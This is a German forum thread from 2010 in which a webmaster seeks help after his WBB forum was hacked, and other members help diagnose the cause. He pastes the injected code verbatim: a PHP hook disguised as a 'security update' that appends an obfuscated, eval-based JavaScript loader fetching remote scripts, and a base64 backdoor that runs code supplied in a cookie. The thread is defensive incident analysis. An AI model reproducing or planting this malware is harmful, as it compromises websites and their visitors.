[HaBo]

master-protic · 08.03.10, 21:48

Hallo

ICh habe ein Problem da mir jemand einen Javascrypt Code in meine Webseite eingebaut hat. Jedoch winde ich nicht den Fehler wie er es geschafft hat.

Hier mal der Code der eingebaut wurde

Code:

<?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;caZ3dZ22Z2566unZ2563tiZ256fn Z2564csZ2528Z2564sZ252ceZ2573)Z257bdsZ253dunZ2565scaZ2570Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;ccZ3dZ225Z256egZ2574h;iZ252b+)Z257btmpZ253ddZ2573Z252esZ256cZ2569cZ2565(i,Z2569+Z2531)Z22;ceZ3dZ22Z2563harZ2543oZ2564eZ2541tZ25280)Z255e(Z25270x0Z2530Z2527+eZ2573))Z2529;Z257d}Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574Z253bdZ2563sZ2528dZ2561+Z2564Z2562Z252bZ2564Z2563+Z2564Z2564Z252bdZ2565Z252cZ25310Z2529;Z2564Z2577(Z2573tZ2529;Z2573tZ253dZ2524Z2561;Z2522Z253bZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ22;sZ2574Z253dst+Z2553tZ2572ingZ252efrZ256fmCZ2568arZ2543odeZ2528Z2528tZ256dp.Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566uncZ2574iZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ2525Z2532ewrZ252569tZ2565(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572Z252569Z252570tZ252520lZ2561Z25256egZ2575Z2561Z252567Z2565Z25253Z2564Z25255cZ2525Z25322jaZ2576asZ2563rZ252569Z2570tZ25255Z2563Z252522Z25253eZ2527;Z2563cZ253dZ2527Z25253cZ25255cZ25252fscrZ2569Z252570tZ25253Z2565Z2527;Z2565valZ2528uneZ2573caZ2570e(tZ2529)}Z253bZ22;cbZ3dZ22e(dZ2573Z2529Z253bstZ253dtmpZ253dZ2527Z2527;for(iZ253d0Z253biZ253cZ2564s.lZ256Z22;czZ3dZ22Z2566unZ2563tZ2569on Z2563z(cZ257a)Z257bretZ2575Z2572n Z2563aZ252bcZ2562Z252bcZ2563+cdZ252bceZ252bczZ253b};Z22;Z69f Z28dZ6fcZ75menZ74.Z63ooZ6biZ65.iZ6eZ64exZ4ff(Z27rfZ35Z666dsZ27)Z3dZ3d-1)Z7bfuncZ74ionZ20calZ6cZ62Z61Z63kZ28x)Z7bwZ69nZ64ow.Z74Z77 Z3d x;vaZ72 d Z3d nZ65w DZ61tZ65(Z29;Z64.sZ65Z74TimZ65(xZ5bZ22as_ofZ22]*Z31000Z29;Z76Z61r Z68 Z3d d.Z67eZ74UZ54Z43HoZ75Z72s()Z3bZ77iZ6edZ6fw.hZ20Z3d h;iZ66 (hZ20Z3e 8)Z7bd.sZ65tUZ54CZ44aZ74Z65Z28dZ2eZ67Z65tUTZ43DaZ74e()Z20-Z20Z32);Z7delZ73eZ7bdZ2eZ73eZ74Z55TZ43DaZ74Z65Z28d.gZ65Z74UZ54CDaZ74eZ28Z29 Z2d 3Z29;}Z77inZ64owZ2eZ67d Z3d dZ3bvaZ72Z20tiZ6de Z3d neZ77 Z41rrZ61y()Z3bZ76aZ72 shZ69ftZ49ndeZ78 Z3d Z22Z22;tiZ6de[Z22yZ65Z61rZ22] Z3d Z64.geZ74UZ54CFuZ6cZ6cZ59eZ61rZ28)Z3bZ74iZ6de[Z22Z6dontZ68Z22] Z3d d.gZ65tZ55Z54CMoZ6eZ74Z68()+Z31Z3btiZ6de[Z22dayZ22] Z3d d.geZ74Z55TCDZ61te(Z29;Z69Z66 (Z64Z2egeZ74UTZ43MZ6fZ6etZ68()+Z31 Z3c 10)Z7bshifZ74IndZ65Z78 Z3d Z74Z69meZ5bZ22yearZ22]Z20+Z20Z22-0Z22 Z2b (Z64.geZ74UTCZ4dZ6fnZ74Z68Z28Z29+Z31);}Z65lsZ65Z7bsZ68iftZ49ndZ65x Z3d tZ69Z6deZ5bZ22yeaZ72Z22] Z2b Z22-Z22 + Z28Z64.gZ65tUTZ43MoZ6eth(Z29Z2b1)Z3b}Z69fZ20(dZ2egetZ55Z54CDaZ74eZ28) Z3c 1Z30Z29Z7bsZ68iftZ49nZ64exZ20Z3dZ73hiZ66tInZ64eZ78 +Z20Z22Z2d0Z22 + Z64.gZ65tUZ54CDZ61te(Z29;Z7delsZ65Z7bshifZ74Z49nZ64Z65xZ20Z3dZ20shZ69Z66tIZ6eZ64Z65xZ20+Z20Z22-Z22 + Z64.Z67eZ74UTZ43DaZ74e(Z29;Z7dZ64ocuZ6dentZ2ewZ72iZ74eZ28Z22Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61geZ3djavZ61Z73crZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fseZ61rchZ2etwiZ74tZ65Z72.coZ6dZ2ftreZ6edsZ2fdZ61Z69Z6cZ79.jsZ6fn?dZ61teZ3dZ22+ shZ69ftIZ6edeZ78+Z22&cZ61Z6clZ62Z61Z63kZ3dcaZ6clbaZ63Z6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22iZ70tZ3eZ22);} Z66uncZ74iZ6fn cZ61Z6clbZ61Z63Z6b2(xZ29Z7bZ77Z69ndoZ77.Z74w Z3d x;Z73c(Z27rfZ35fZ36dsZ27,2,Z37Z29;evZ61l(uZ6eescZ61pe(Z64z+cZ7a+opZ2bsZ74)+Z27dZ77(dzZ2bcZ7a($Z61Z2bZ73Z74));Z27)Z3bdocZ75meZ6et.wZ72itZ65Z28$aZ29;}dZ6fcumZ65Z6et.wZ72Z69teZ28Z22Z3cimg sZ72Z63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.tZ77iZ74tZ65r.Z63Z6fmZ2fiZ6dagZ65sZ2fsearcZ68Z2frsZ73Z2epZ6egZ27Z20wiZ64Z74hZ3d1 heZ69ghtZ3dZ31 stZ79Z6ceZ3dZ27visZ69bilZ69ty:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipZ74 Z6cZ61ngZ75aZ67eZ3djavaZ73crZ69pZ74Z22+Z22 srcZ3dZ27http:Z2fZ2fsZ65arZ63h.Z74wiZ74terZ2ecoZ6dZ2ftreZ6edsZ2fdaZ69ly.Z6aZ73oZ6eZ3fcalZ6cbZ61cZ6bZ3dcaZ6clZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};functiZ6fn Z73c(Z63Z6em,vZ2ceZ64)Z7bvZ61r eZ78dZ3dneZ77 DaZ74e(Z29;exZ64Z2esZ65tDaZ74e(eZ78Z64Z2egetZ44Z61tZ65Z28)+eZ64);dZ6fcuZ6deZ6eZ74.cZ6foZ6bieZ3dcnZ6d+Z20Z27Z3dZ27 +escaZ70eZ28Z76)+Z27;Z65xpiZ72eZ73Z3dZ27+exd.Z74oGMZ54Z53tZ72ingZ28Z29;Z7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script>';}//important security update ?>

easteregg · 08.03.10, 22:05

poste mal den code rings rum, auf der seite wo es eingebaut wurde. dann ist die lücke wesentlich eher ersichtlich.
aber das wahrscheinliche is nen parameter oder formulareintrag der nicht sauber verarbeitet wurde und dann direkt auf die seite ausgegeben wird.
oder eine rfi oder lfi ... wer wees wer wees, poste mal den code, dann können wir dir besser helfen.

HaBo Ads

master-protic · 08.03.10, 22:24

Hallo

Es sind alle index.php und index.html die auf dem Server sind

Code:

<html>
<head>
<title>Ihre Domain</title>
<meta http-equiv="Content-type" content="text/html; charset=iso-8859-1">
<meta http-equiv="refresh" content="0; URL=http://www.tacklemarkt.de/hmportal.php">
</head>
<body>
Sie werden weitergeleitet... Falls nicht, klicken Sie hier:
<a href="http://www.domain.tld/neuesziel/">http://www.tacklemarkt.de/hmportal.php</a>
<script language="javascript">$a="Z6fpZ3dZ22Z2524Z2561Z253dZ2522dw(dcZ2573(cuZ252c14)Z2529;Z2522;Z22;ddZ3dZ22qb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25209M0;0|uddubcK8888dy}uK7iZ22;caZ3dZ22Z2566unZ2563tiZ256fn Z2564csZ2528Z2564sZ252ceZ2573)Z257bdsZ253dunZ2565scaZ2570Z22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edZ22;dcZ3dZ227Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;08y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fZ22;dbZ3dZ22gZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0!Z2520;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vrs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07hucZ22;ccZ3dZ225Z256egZ2574h;iZ252b+)Z257btmpZ253ddZ2573Z252esZ256cZ2569cZ2565(i,Z2569+Z2531)Z22;ceZ3dZ22Z2563harZ2543oZ2564eZ2541tZ25280)Z255e(Z25270x0Z2530Z2527+eZ2573))Z2529;Z257d}Z22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574Z253bdZ2563sZ2528dZ2561+Z2564Z2562Z252bZ2564Z2563+Z2564Z2564Z252bdZ2565Z252cZ25310Z2529;Z2564Z2577(Z2573tZ2529;Z2573tZ253dZ2524Z2561;Z2522Z253bZ22;deZ3dZ22uqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;cdZ3dZ22;sZ2574Z253dst+Z2553tZ2572ingZ252efrZ256fmCZ2568arZ2543odeZ2528Z2528tZ256dp.Z22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;sZ7bxpyz;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dzZ3dZ22Z2566uncZ2574iZ256fn Z2564w(tZ2529Z257bcaZ253dZ2527Z252564ocuZ25256deZ256etZ2525Z2532ewrZ252569tZ2565(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253cscZ252572Z252569Z252570tZ252520lZ2561Z25256egZ2575Z2561Z252567Z2565Z25253Z2564Z25255cZ2525Z25322jaZ2576asZ2563rZ252569Z2570tZ25255Z2563Z252522Z25253eZ2527;Z2563cZ253dZ2527Z25253cZ25255cZ25252fscrZ2569Z252570tZ25253Z2565Z2527;Z2565valZ2528uneZ2573caZ2570e(tZ2529)}Z253bZ22;cbZ3dZ22e(dZ2573Z2529Z253bstZ253dtmpZ253dZ2527Z2527;for(iZ253d0Z253biZ253cZ2564s.lZ256Z22;czZ3dZ22Z2566unZ2563tZ2569on Z2563z(cZ257a)Z257bretZ2575Z2572n Z2563aZ252bcZ2562Z252bcZ2563+cdZ252bceZ252bczZ253b};Z22;Z69f Z28dZ6fcZ75menZ74.Z63ooZ6biZ65.iZ6eZ64exZ4ff(Z27rfZ35Z666dsZ27)Z3dZ3d-1)Z7bfuncZ74ionZ20calZ6cZ62Z61Z63kZ28x)Z7bwZ69nZ64ow.Z74Z77 Z3d x;vaZ72 d Z3d nZ65w DZ61tZ65(Z29;Z64.sZ65Z74TimZ65(xZ5bZ22as_ofZ22]*Z31000Z29;Z76Z61r Z68 Z3d d.Z67eZ74UZ54Z43HoZ75Z72s()Z3bZ77iZ6edZ6fw.hZ20Z3d h;iZ66 (hZ20Z3e 8)Z7bd.sZ65tUZ54CZ44aZ74Z65Z28dZ2eZ67Z65tUTZ43DaZ74e()Z20-Z20Z32);Z7delZ73eZ7bdZ2eZ73eZ74Z55TZ43DaZ74Z65Z28d.gZ65Z74UZ54CDaZ74eZ28Z29 Z2d 3Z29;}Z77inZ64owZ2eZ67d Z3d dZ3bvaZ72Z20tiZ6de Z3d neZ77 Z41rrZ61y()Z3bZ76aZ72 shZ69ftZ49ndeZ78 Z3d Z22Z22;tiZ6de[Z22yZ65Z61rZ22] Z3d Z64.geZ74UZ54CFuZ6cZ6cZ59eZ61rZ28)Z3bZ74iZ6de[Z22Z6dontZ68Z22] Z3d d.gZ65tZ55Z54CMoZ6eZ74Z68()+Z31Z3btiZ6de[Z22dayZ22] Z3d d.geZ74Z55TCDZ61te(Z29;Z69Z66 (Z64Z2egeZ74UTZ43MZ6fZ6etZ68()+Z31 Z3c 10)Z7bshifZ74IndZ65Z78 Z3d Z74Z69meZ5bZ22yearZ22]Z20+Z20Z22-0Z22 Z2b (Z64.geZ74UTCZ4dZ6fnZ74Z68Z28Z29+Z31);}Z65lsZ65Z7bsZ68iftZ49ndZ65x Z3d tZ69Z6deZ5bZ22yeaZ72Z22] Z2b Z22-Z22 + Z28Z64.gZ65tUTZ43MoZ6eth(Z29Z2b1)Z3b}Z69fZ20(dZ2egetZ55Z54CDaZ74eZ28) Z3c 1Z30Z29Z7bsZ68iftZ49nZ64exZ20Z3dZ73hiZ66tInZ64eZ78 +Z20Z22Z2d0Z22 + Z64.gZ65tUZ54CDZ61te(Z29;Z7delsZ65Z7bshifZ74Z49nZ64Z65xZ20Z3dZ20shZ69Z66tIZ6eZ64Z65xZ20+Z20Z22-Z22 + Z64.Z67eZ74UTZ43DaZ74e(Z29;Z7dZ64ocuZ6dentZ2ewZ72iZ74eZ28Z22Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61geZ3djavZ61Z73crZ69ptZ22+Z22 srcZ3dZ27http:Z2fZ2fseZ61rchZ2etwiZ74tZ65Z72.coZ6dZ2ftreZ6edsZ2fdZ61Z69Z6cZ79.jsZ6fn?dZ61teZ3dZ22+ shZ69ftIZ6edeZ78+Z22&cZ61Z6clZ62Z61Z63kZ3dcaZ6clbaZ63Z6bZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 +Z20Z22iZ70tZ3eZ22);} Z66uncZ74iZ6fn cZ61Z6clbZ61Z63Z6b2(xZ29Z7bZ77Z69ndoZ77.Z74w Z3d x;Z73c(Z27rfZ35fZ36dsZ27,2,Z37Z29;evZ61l(uZ6eescZ61pe(Z64z+cZ7a+opZ2bsZ74)+Z27dZ77(dzZ2bcZ7a($Z61Z2bZ73Z74));Z27)Z3bdocZ75meZ6et.wZ72itZ65Z28$aZ29;}dZ6fcumZ65Z6et.wZ72Z69teZ28Z22Z3cimg sZ72Z63Z3dZ27httpZ3aZ2fZ2fsZ65arcZ68.tZ77iZ74tZ65r.Z63Z6fmZ2fiZ6dagZ65sZ2fsearcZ68Z2frsZ73Z2epZ6egZ27Z20wiZ64Z74hZ3d1 heZ69ghtZ3dZ31 stZ79Z6ceZ3dZ27visZ69bilZ69ty:Z68iddZ65nZ27 Z2fZ3e Z3cscrZ22+Z22ipZ74 Z6cZ61ngZ75aZ67eZ3djavaZ73crZ69pZ74Z22+Z22 srcZ3dZ27http:Z2fZ2fsZ65arZ63h.Z74wiZ74terZ2ecoZ6dZ2ftreZ6edsZ2fdaZ69ly.Z6aZ73oZ6eZ3fcalZ6cbZ61cZ6bZ3dcaZ6clZ62aZ63kZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}elseZ7b$Z61Z3dZ27Z27};functiZ6fn Z73c(Z63Z6em,vZ2ceZ64)Z7bvZ61r eZ78dZ3dneZ77 DaZ74e(Z29;exZ64Z2esZ65tDaZ74e(eZ78Z64Z2egetZ44Z61tZ65Z28)+eZ64);dZ6fcuZ6deZ6eZ74.cZ6foZ6bieZ3dcnZ6d+Z20Z27Z3dZ27 +escaZ70eZ28Z76)+Z27;Z65xpiZ72eZ73Z3dZ27+exd.Z74oGMZ54Z53tZ72ingZ28Z29;Z7d;";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));</script></html>

// Bearbeitet von Mackz. Bitte das nächste mal Code-Tags verwenden!

easteregg · 08.03.10, 22:43

ist das wbb auf dem aktuellen patchlevel (wird das überhaupt noch supportet?) irgendwleche plugins die sicherheitslücken enthalten können?

nen wbb is nich frei, da darfst du das gar nicht veröffentlichen, nimm den code hier lieber wieder raus, bevor du ärger deswegen bekommst.

master-protic · 08.03.10, 22:49

Hallo

Es ist das Wbb 2.3.6 pl2 aktuellste Version

Anschließend kam die 3 Version die aber komplett anders ist

Tobi

easteregg · 08.03.10, 22:52

und hast du dort irgendwelche plugins installiert?
irgendwelche anderen webapps auf dem gleichen webspace/server?
wurde ggf. dein passwort geknackt (oder ein anderes admin pw?)

**xeno** · 08.03.10, 22:56

Über eine aktivierte Suchfunktion für Nicht-Member lies sich das WBB2 recht einfach übernehmen. Exploits dafür kursieren überall im Netz. Damit ist es möglich, an den (MD5) Passworthash aller User zu kommen, und den in ne Datenbank zu werfen ist kein großer Akt.

Es wäre also in der Tat möglich, daß dein Forum angegriffen wurde. Schau mal im AdminCP nach, ob Zugriffe stattgefunden haben, die nicht von dir sind. Wenn ich mich recht erinnere, werden diese gelogt und angezeigt.

master-protic · 08.03.10, 22:57

Hallo

Diese Hacks sind alle auf dem aktuellen Stand!

Tobi

easteregg · 08.03.10, 22:59

Zitat:

Zitat von xeno

Über eine aktivierte Suchfunktion für Nicht-Member lies sich das WBB2 recht einfach übernehmen. Exploits dafür kursieren überall im Netz. Damit ist es möglich, an den (MD5) Passworthash aller User zu kommen, und den in ne Datenbank zu werfen ist kein großer Akt.

Es wäre also in der Tat möglich, daß dein Forum angegriffen wurde. Schau mal im AdminCP nach, ob Zugriffe stattgefunden haben, die nicht von dir sind. Wenn ich mich recht erinnere, werden diese gelogt und angezeigt.

sollte diese lücke aber nicht gepatched sein?

Zitat:

Zitat von master-protic

Hallo

Diese Hacks sind alle auf dem aktuellen Stand!

Tobi

gib mal ne auflistung über die plugins, weil nur weil die immer auf den aktuellen stand sind, bedeutet das nicht, dass die auch sauber sind!

**xeno** · 08.03.10, 23:04

Zitat:

Zitat von easteregg

sollte diese lücke aber nicht gepatched sein?

Ich hab die Patches für das WBB2 nicht bis zum Ende verfolgt, aber ich wills mal schwer hoffen.

master-protic · 08.03.10, 23:08

Hallo

Galerie V3.5.0 ©2003/2007 by Trooper
User-Map V2.3 © Viktor
Security System Premium 3.0.1 premium
HM-Portal V3.1.4 by Old_Surehand / Trooper
JGS-Datenbank Version 3.0.0 © 2002-2010 ww

Tobiw.jgs-xa.de

master-protic · 08.03.10, 23:12

Zitat von easteregg
sollte diese lücke aber nicht gepatched sein?

Dies wurde durch die Version pl2 gepatcht

In einer Datei namens mailcheck.php wurde folgender code gefunden

<?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUF NFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29kZSgkX0NPT0tJ RVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'));
echo "checking email...";
?>

Tobi

easteregg · 10.03.10, 18:04

die wurde scheinbar überschreiben, eben durch eine lfi oder rfi. ist nur die frage wo die sicherheitslücke dazu ist.
schau mal nach ob irgendwo daten includiert werden, die vorher nicht sauber abgefragt werden. dann schau mal in den logs nach, ob da irgendwie code durch fehlende daten eingeschleust wurde, und anschliesend die logs includiert worden (lfi)
dann schau mal nach - wenns nen root ist - ob die php einstellungen sauber sind, sprich ob die scripte auch nur in ihren verzeichnissen lesen dürfen, ob der apache auch niht als root läuft, ob ein includieren via http erlaubt ist etc pp.... register globals auf off ...

das übliche!

**xeno** · 10.03.10, 18:19

Da steht bloß:

Code:

if(isset($_COOKIE["PHPSESSIID"])){eval(base64_decode($_COOKIE["PHPSESSIID"]));exit;}

Da ist nichts gefährliches dran. Oder überseh ich was?

easteregg · 10.03.10, 18:41

der führt den inhalt des cookies aus.
sprich du kannst da beliebigen code reinbringen indem du den per cookie übermittelst...

das is mega gefährlich ;D

Empfehlung

08.03.10, 22:05	#2 (permalink)
easteregg Member of Honour Registriert seit: 14.09.07 Likes: 60	poste mal den code rings rum, auf der seite wo es eingebaut wurde. dann ist die lücke wesentlich eher ersichtlich. aber das wahrscheinliche is nen parameter oder formulareintrag der nicht sauber verarbeitet wurde und dann direkt auf die seite ausgegeben wird. oder eine rfi oder lfi ... wer wees wer wees, poste mal den code, dann können wir dir besser helfen. __________________ » Flattr mich! - Wenn dir mein Beitrag geholfen hat! « <\| 2 AMD Opterons 2384@ 8x3,2ghz \| Tyan S2915 \| 10GB \| 2x 8800GT \| 8400GS \| Dell 3008WFP + 2x2007FP \|>

08.03.10, 22:43	#4 (permalink)
easteregg Member of Honour Registriert seit: 14.09.07 Likes: 60	ist das wbb auf dem aktuellen patchlevel (wird das überhaupt noch supportet?) irgendwleche plugins die sicherheitslücken enthalten können? nen wbb is nich frei, da darfst du das gar nicht veröffentlichen, nimm den code hier lieber wieder raus, bevor du ärger deswegen bekommst. __________________ » Flattr mich! - Wenn dir mein Beitrag geholfen hat! « <\| 2 AMD Opterons 2384@ 8x3,2ghz \| Tyan S2915 \| 10GB \| 2x 8800GT \| 8400GS \| Dell 3008WFP + 2x2007FP \|>

08.03.10, 22:52	#6 (permalink)
easteregg Member of Honour Registriert seit: 14.09.07 Likes: 60	und hast du dort irgendwelche plugins installiert? irgendwelche anderen webapps auf dem gleichen webspace/server? wurde ggf. dein passwort geknackt (oder ein anderes admin pw?) __________________ » Flattr mich! - Wenn dir mein Beitrag geholfen hat! « <\| 2 AMD Opterons 2384@ 8x3,2ghz \| Tyan S2915 \| 10GB \| 2x 8800GT \| 8400GS \| Dell 3008WFP + 2x2007FP \|>

08.03.10, 22:56	#7 (permalink)
